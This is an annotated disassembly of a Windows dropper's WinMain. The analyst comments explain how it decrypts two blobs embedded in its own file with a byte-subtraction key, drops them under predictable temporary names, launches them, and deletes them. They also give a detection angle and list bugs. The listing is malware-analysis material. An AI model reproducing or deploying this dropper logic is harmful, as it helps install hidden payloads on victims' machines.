.text:0040160C ; --------------- S U B R O U T I N E ---------------------------------------
.text:0040160C
.text:0040160C ; Attributes: bp-based frame
.text:0040160C
.text:0040160C ; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
.text:0040160C ;
.text:0040160C ; Analyst summary (derived from the instructions below, not from external knowledge):
.text:0040160C ;   Self-extracting dropper. WinMain opens its own image, reads an 18h-byte trailer
.text:0040160C ;   from the end of the file, and uses it to locate two embedded blobs laid out as
.text:0040160C ;       [... PE ...][blob1, var_20 bytes][blob2, var_1C bytes][trailer, 18h bytes]<EOF>
.text:0040160C ;   Each blob is "decrypted" by subtracting one constant from every byte, written to a
.text:0040160C ;   freshly named file in a directory chosen by a trailer field, optionally launched via
.text:0040160C ;   ShellExecuteA, and (after a 5 s Sleep) optionally deleted again.
.text:0040160C ;
.text:0040160C ; Trailer layout as read into var_20 (offsets relative to var_20):
.text:0040160C ;   +00h var_20  dword  size of blob 1
.text:0040160C ;   +04h var_1C  dword  size of blob 2
.text:0040160C ;   +08h var_18  dword  passed with a small index (0..5) to sub_4015F8 -- looks like a
.text:0040160C ;                       per-feature flag/field lookup, but sub_4015F8 is not in this listing;
.text:0040160C ;                       confirm before relying on bit semantics
.text:0040160C ;   +0Ch var_14  word   output-directory selector: 1=temp, 2=system, 3=windows, else cwd
.text:0040160C ;   +0Eh var_12  5 bytes  string appended after the tmpnam() name for file 1 (likely an
.text:0040160C ;   +13h var_D   5 bytes  extension such as ".exe" -- inferred from the "%s%s%s" use only)
.text:0040160C ;
.text:0040160C ; Review notes: no return value of fopen/fread/fgetc is ever checked (a NULL FILE* from
.text:0040160C ;   fopen flows straight into fseek/fgetc); the trailer sizes are trusted without bounds;
.text:0040160C ;   wsprintfA builds a 104h-byte path from a 104h-byte directory plus name plus suffix
.text:0040160C ;   with no length check; tmpnam() names are predictable, so the drop location is
.text:0040160C ;   guessable. Every stack buffer below is 104h bytes (MAX_PATH).
.text:0040160C ;   Detection angle: process reads its own image, creates two files in %TEMP%/system/
.text:0040160C ;   Windows/cwd, ShellExecutes them, sleeps 5000 ms, then DeleteFile()s them.
.text:0040160C _WinMain@16 proc near ; CODE XREF: start+12Fp
.text:0040160C
.text:0040160C Filename = byte ptr -534h
.text:0040160C var_430 = byte ptr -430h
.text:0040160C var_32C = byte ptr -32Ch
.text:0040160C FileName = byte ptr -228h
.text:0040160C Buffer = byte ptr -124h
.text:0040160C var_20 = dword ptr -20h
.text:0040160C var_1C = dword ptr -1Ch
.text:0040160C var_18 = dword ptr -18h
.text:0040160C var_14 = word ptr -14h
.text:0040160C var_12 = dword ptr -12h
.text:0040160C var_D = dword ptr -0Dh
.text:0040160C var_8 = dword ptr -8
.text:0040160C var_4 = dword ptr -4
.text:0040160C hModule = dword ptr 8
.text:0040160C hPrevInstance = dword ptr 0Ch
.text:0040160C lpCmdLine = dword ptr 10h
.text:0040160C nShowCmd = dword ptr 14h
.text:0040160C
.text:0040160C push ebp
.text:0040160D mov ebp, esp
.text:0040160F sub esp, 534h ; 5 x 104h path buffers + trailer + two FILE* locals
.text:00401615 push esi
.text:00401616 mov esi, 104h ; esi = MAX_PATH, reused as the size arg for every path API below
.text:0040161B push edi
.text:0040161C lea eax, [ebp+Filename]
.text:00401622 push esi ; nSize
.text:00401623 push eax ; lpFilename
.text:00401624 push [ebp+hModule] ; hModule
.text:00401627 call ds:GetModuleFileNameA ; GetModuleFileName(hModule,lpFilename,nSize) -
.text:00401627 ; get the full path of our own EXE into Filename
.text:00401627 ;
.text:0040162D lea eax, [ebp+Filename]
.text:00401633 push offset aRb ; "rb"
.text:00401638 push eax ; char *
.text:00401639 call fopen
.text:0040163E mov edi, eax ; edi=fopen(lpFilename,"rb") -
.text:0040163E ; open our own EXE for reading; FILE* kept in edi
.text:0040163E ; NOTE(review): never tested for NULL
.text:0040163E ;
.text:00401640 push 2 ; int
.text:00401642 push 0FFFFFFE8h ; __int32
.text:00401644 push edi ; FILE *
.text:00401645 call fseek ; fseek(edi,-18h,SEEK_END) -
.text:00401645 ; seek to 18h bytes before the end of our own EXE
.text:00401645 ;
.text:0040164A push edi ; FILE *
.text:0040164B push 1 ; size_t
.text:0040164D lea eax, [ebp+var_20]
.text:00401650 push 18h ; size_t
.text:00401652 push eax ; void *
.text:00401653 call fread ; fread(var_20,18h,1,edi) -
.text:00401653 ; read the 18h-byte trailer from the end of our own EXE
.text:00401653 ; into var_20 (layout documented in the header)
.text:00401653 ; NOTE(review): return count not checked
.text:00401658 movsx eax, [ebp+var_14] ; directory selector word from the trailer
.text:0040165C add esp, 24h ; clean up fopen(8)+fseek(0Ch)+fread(10h)
.text:0040165F dec eax
.text:00401660 jz short loc_401698 ; 1 -> temp directory
.text:00401662 dec eax
.text:00401663 jz short loc_401688 ; 2 -> system directory
.text:00401665 dec eax
.text:00401666 jz short loc_401678 ; 3 -> Windows directory
.text:00401668 lea eax, [ebp+Buffer] ; default (any other value) -> current directory
.text:00401668 ;
.text:0040166E push eax ; lpBuffer
.text:0040166F push esi ; nBufferLength
.text:00401670 call ds:GetCurrentDirectoryA
.text:00401676 jmp short loc_4016A6 ; Buffer = current directory
.text:00401676 ;
.text:00401678 ; ---------------------------------------------------------------------------
.text:00401678
.text:00401678 loc_401678: ; CODE XREF: WinMain(x,x,x,x)+5Aj
.text:00401678 lea eax, [ebp+Buffer]
.text:0040167E push esi ; uSize
.text:0040167F push eax ; lpBuffer
.text:00401680 call ds:GetWindowsDirectoryA
.text:00401686 jmp short loc_4016A6 ; Buffer = Windows directory
.text:00401686 ;
.text:00401688 ; ---------------------------------------------------------------------------
.text:00401688
.text:00401688 loc_401688: ; CODE XREF: WinMain(x,x,x,x)+57j
.text:00401688 lea eax, [ebp+Buffer]
.text:0040168E push esi ; uSize
.text:0040168F push eax ; lpBuffer
.text:00401690 call ds:GetSystemDirectoryA
.text:00401696 jmp short loc_4016A6 ; Buffer = system directory
.text:00401696 ;
.text:00401698 ; ---------------------------------------------------------------------------
.text:00401698
.text:00401698 loc_401698: ; CODE XREF: WinMain(x,x,x,x)+54j
.text:00401698 lea eax, [ebp+Buffer]
.text:0040169E push eax ; lpBuffer
.text:0040169F push esi ; nBufferLength
.text:004016A0 call ds:GetTempPathA ; Buffer = temp directory
.text:004016A6
.text:004016A6 loc_4016A6: ; CODE XREF: WinMain(x,x,x,x)+6Aj
.text:004016A6 ; WinMain(x,x,x,x)+7Aj ...
.text:004016A6 lea eax, [ebp+var_430]
.text:004016AC push ebx ; save callee-saved ebx (restored at 40183F)
.text:004016AD push eax ; char *
.text:004016AE call tmpnam ; "random" temporary name into var_430 --
.text:004016AE ; tmpnam() output is predictable, so the drop path is guessable
.text:004016AE ;
.text:004016B3 lea eax, [ebp+var_12]
.text:004016B6 mov esi, ds:wsprintfA
.text:004016BC push eax
.text:004016BD lea eax, [ebp+var_430]
.text:004016C3 push eax
.text:004016C4 lea eax, [ebp+Buffer]
.text:004016CA push eax
.text:004016CB mov ebx, offset aSSS ; "%s%s%s"
.text:004016D0 lea eax, [ebp+FileName]
.text:004016D6 push ebx ; LPCSTR
.text:004016D7 push eax ; LPSTR
.text:004016D8 call esi ; wsprintfA ; wsprintf(FileName,"%s%s%s",Buffer,var_430,var_12)
.text:004016D8 ; FileName = Buffer + var_430 + var_12 -- path for drop file 1
.text:004016D8 ; NOTE(review): no length check; FileName is 104h bytes
.text:004016DA lea eax, [ebp+var_430]
.text:004016E0 push eax ; char *
.text:004016E1 call tmpnam ; second "random" temporary name into var_430
.text:004016E1 ;
.text:004016E6 lea eax, [ebp+var_D]
.text:004016E9 push eax
.text:004016EA lea eax, [ebp+var_430]
.text:004016F0 push eax
.text:004016F1 lea eax, [ebp+Buffer]
.text:004016F7 push eax
.text:004016F8 lea eax, [ebp+var_32C]
.text:004016FE push ebx ; LPCSTR
.text:004016FF push eax ; LPSTR
.text:00401700 call esi ; wsprintfA ; var_32C = Buffer + var_430 + var_D -- path for drop file 2
.text:00401700 ;
.text:00401702 push 4
.text:00401704 push [ebp+var_18]
.text:00401707 call sub_4015F8 ; sub_4015F8(var_18, 4) -- trailer flag/field query, body not in this listing
.text:0040170C add esp, 38h ; clean up 2x tmpnam(8)+2x wsprintf(28h)+sub_4015F8(8)
.text:0040170F test eax, eax
.text:00401711 jz short loc_401718
.text:00401713 call sub_401488 ; KillProcess1 (analyst label; not verified here)
.text:00401718
.text:00401718 loc_401718: ; CODE XREF: WinMain(x,x,x,x)+105j
.text:00401718 push 5
.text:0040171A push [ebp+var_18]
.text:0040171D call sub_4015F8 ; sub_4015F8(var_18, 5)
.text:00401722 pop ecx
.text:00401723 test eax, eax
.text:00401725 pop ecx
.text:00401726 jz short loc_40172D
.text:00401728 call sub_401540 ; KillProcess2 (analyst label; not verified here)
.text:0040172D
.text:0040172D loc_40172D: ; CODE XREF: WinMain(x,x,x,x)+11Aj
.text:0040172D mov esi, offset aWb ; "wb"
.text:00401732 lea eax, [ebp+FileName]
.text:00401738 push esi ; char *
.text:00401739 push eax ; char *
.text:0040173A call fopen
.text:0040173F mov [ebp+var_8], eax ; var_8=fopen(FileName,"wb"); -
.text:0040173F ; open drop file 1 for writing
.text:0040173F ; NOTE(review): never tested for NULL
.text:0040173F ;
.text:00401742 lea eax, [ebp+var_32C]
.text:00401748 push esi ; char *
.text:00401749 push eax ; char *
.text:0040174A call fopen
.text:0040174F push 2 ; SEEK_END for the fseek below
.text:00401751 mov [ebp+var_4], eax ; var_4=fopen(var_32C,"wb")
.text:00401751 ; open drop file 2 for writing (also unchecked)
.text:00401751 ;
.text:00401754 push [ebp+var_18]
.text:00401757 xor ebx, ebx ; ebx = 0 (NULL for ShellExecuteA args later)
.text:00401759 xor esi, esi ; esi = byte counter
.text:0040175B call sub_4015F8 ; sub_4015F8(var_18, 2) -> per-byte key
.text:00401760 push 2 ; int
.text:00401762 push 0FFFFFFE8h
.text:00401764 mov [ebp+hModule], eax ; key stored in the (now unused) hModule arg slot
.text:00401767 pop eax ; eax = -18h
.text:00401768 sub eax, [ebp+var_1C]
.text:0040176B sub eax, [ebp+var_20] ; eax = -(18h + size2 + size1) = start of blob 1
.text:0040176E push eax ; __int32
.text:0040176F push edi ; FILE *
.text:00401770 call fseek ; fseek(edi, -(18h+var_1C+var_20), SEEK_END)
.text:00401775 add esp, 24h ; clean up 2x fopen(10h)+sub_4015F8(8)+fseek(0Ch)
.text:00401778
.text:00401778 loc_401778: ; CODE XREF: WinMain(x,x,x,x)+188j
.text:00401778 push edi ; Decrypt1: for each of var_20 bytes, out = in - key
.text:00401779 call fgetc
.text:0040177E push [ebp+var_8] ; FILE *
.text:00401781 movsx eax, al ; EOF (-1) is not distinguished from data here
.text:00401784 sub eax, [ebp+hModule] ; subtract the key; fputc keeps the low byte
.text:00401787 push eax ; int
.text:00401788 call fputc
.text:0040178D add esp, 0Ch
.text:00401790 inc esi
.text:00401791 cmp esi, [ebp+var_20]
.text:00401794 jl short loc_401778 ; signed compare against an untrusted size
.text:00401796 push 2 ; int
.text:00401798 push 0FFFFFFE8h
.text:0040179A pop eax ; eax = -18h
.text:0040179B sub eax, [ebp+var_1C] ; eax = -(18h + size2) = start of blob 2
.text:0040179E push eax ; __int32
.text:0040179F push edi ; FILE *
.text:004017A0 call fseek ; fseek(edi, -(18h+var_1C), SEEK_END)
.text:004017A5 add esp, 0Ch
.text:004017A8 xor esi, esi ; reset byte counter
.text:004017AA
.text:004017AA loc_4017AA: ; CODE XREF: WinMain(x,x,x,x)+1BAj
.text:004017AA push edi ; Decrypt2: same byte-subtract loop, var_1C bytes, into drop file 2
.text:004017AB call fgetc
.text:004017B0 push [ebp+var_4] ; FILE *
.text:004017B3 movsx eax, al
.text:004017B6 sub eax, [ebp+hModule] ; same key as blob 1
.text:004017B9 push eax ; int
.text:004017BA call fputc
.text:004017BF add esp, 0Ch
.text:004017C2 inc esi
.text:004017C3 cmp esi, [ebp+var_1C]
.text:004017C6 jl short loc_4017AA
.text:004017C8 push [ebp+var_8] ; FILE *
.text:004017CB call fclose ; close drop file 1
.text:004017D0 push [ebp+var_4] ; FILE *
.text:004017D3 call fclose ; close drop file 2
.text:004017D8 push edi ; FILE *
.text:004017D9 call fclose ; close our own EXE
.text:004017DE push ebx
.text:004017DF push [ebp+var_18]
.text:004017E2 call sub_4015F8 ; sub_4015F8(var_18, 0): run drop file 1?
.text:004017E7 mov esi, ds:ShellExecuteA ; Opens or prints a specified file
.text:004017ED add esp, 14h ; clean up 3x fclose(0Ch)+sub_4015F8(8)
.text:004017F0 test eax, eax
.text:004017F2 jz short loc_401803
.text:004017F4 push 0Ah ; nShowCmd (SW_SHOWDEFAULT)
.text:004017F6 push ebx ; lpDirectory
.text:004017F7 lea eax, [ebp+FileName]
.text:004017FD push ebx ; lpParameters
.text:004017FE push eax ; lpFile
.text:004017FF push ebx ; lpOperation
.text:00401800 push ebx ; hwnd
.text:00401801 call esi ; ShellExecuteA ; launch FileName (drop file 1) with default verb
.text:00401803
.text:00401803 loc_401803: ; CODE XREF: WinMain(x,x,x,x)+1E6j
.text:00401803 push 1
.text:00401805 push [ebp+var_18]
.text:00401808 call sub_4015F8 ; sub_4015F8(var_18, 1): run drop file 2?
.text:0040180D pop ecx
.text:0040180E test eax, eax
.text:00401810 pop ecx
.text:00401811 jz short loc_401822
.text:00401813 push 0Ah ; nShowCmd (SW_SHOWDEFAULT)
.text:00401815 push ebx ; lpDirectory
.text:00401816 lea eax, [ebp+var_32C]
.text:0040181C push ebx ; lpParameters
.text:0040181D push eax ; lpFile
.text:0040181E push ebx ; lpOperation
.text:0040181F push ebx ; hwnd
.text:00401820 call esi ; ShellExecuteA ; launch var_32C (drop file 2) with default verb
.text:00401822
.text:00401822 loc_401822: ; CODE XREF: WinMain(x,x,x,x)+205j
.text:00401822 push 1388h ; dwMilliseconds = 5000
.text:00401827 call ds:Sleep ; give the launched files time to start before cleanup
.text:0040182D push 3
.text:0040182F push [ebp+var_18]
.text:00401832 call sub_4015F8 ; sub_4015F8(var_18, 3): delete drop files?
.text:00401837 mov esi, ds:DeleteFileA
.text:0040183D pop ecx
.text:0040183E pop ecx
.text:0040183F pop ebx ; restore callee-saved ebx
.text:00401840 test eax, eax
.text:00401842 jz short loc_40184D
.text:00401844 lea eax, [ebp+FileName]
.text:0040184A push eax ; lpFileName
.text:0040184B call esi ; DeleteFileA ; delete drop file 1 (FileName)
.text:0040184D
.text:0040184D loc_40184D: ; CODE XREF: WinMain(x,x,x,x)+236j
.text:0040184D push 3
.text:0040184F push [ebp+var_18]
.text:00401852 call sub_4015F8 ; same query (var_18, 3) again for drop file 2
.text:00401857 pop ecx
.text:00401858 test eax, eax
.text:0040185A pop ecx
.text:0040185B jz short loc_401866
.text:0040185D lea eax, [ebp+var_32C]
.text:00401863 push eax ; lpFileName
.text:00401864 call esi ; DeleteFileA ; delete drop file 2 (var_32C)
.text:00401866
.text:00401866 loc_401866: ; CODE XREF: WinMain(x,x,x,x)+24Fj
.text:00401866 pop edi
.text:00401867 xor eax, eax ; return 0
.text:00401869 pop esi
.text:0040186A leave
.text:0040186B retn 10h
.text:0040186B _WinMain@16 endp
.text:0040186B
.text:0040186E ; [00000006 BYTES: COLLAPSED FUNCTION Process32Next. PRESS KEYPAD "+" TO EXPAND]
.text:00401874 ; [00000006 BYTES: COLLAPSED FUNCTION Process32First. PRESS KEYPAD "+" TO EXPAND]
.text:0040187A ; [00000006 BYTES: COLLAPSED FUNCTION CreateToolhelp32Snapshot. PRESS KEYPAD "+" TO EXPAND]
.text:00401880 ; [00000006 BYTES: COLLAPSED FUNCTION strstr. PRESS KEYPAD "+" TO EXPAND]
.text:00401886 ; [00000006 BYTES: COLLAPSED FUNCTION fclose. PRESS KEYPAD "+" TO EXPAND]
.text:0040188C ; [00000006 BYTES: COLLAPSED FUNCTION fputc. PRESS KEYPAD "+" TO EXPAND]
.text:00401892 ; [00000006 BYTES: COLLAPSED FUNCTION fgetc. PRESS KEYPAD "+" TO EXPAND]
.text:00401898 ; [00000006 BYTES: COLLAPSED FUNCTION tmpnam. PRESS KEYPAD "+" TO EXPAND]
.text:0040189E ; [00000006 BYTES: COLLAPSED FUNCTION fread. PRESS KEYPAD "+" TO EXPAND]
.text:004018A4 ; [00000006 BYTES: COLLAPSED FUNCTION fseek. PRESS KEYPAD "+" TO EXPAND]
.text:004018AA ; [00000006 BYTES: COLLAPSED FUNCTION fopen. PRESS KEYPAD "+" TO EXPAND]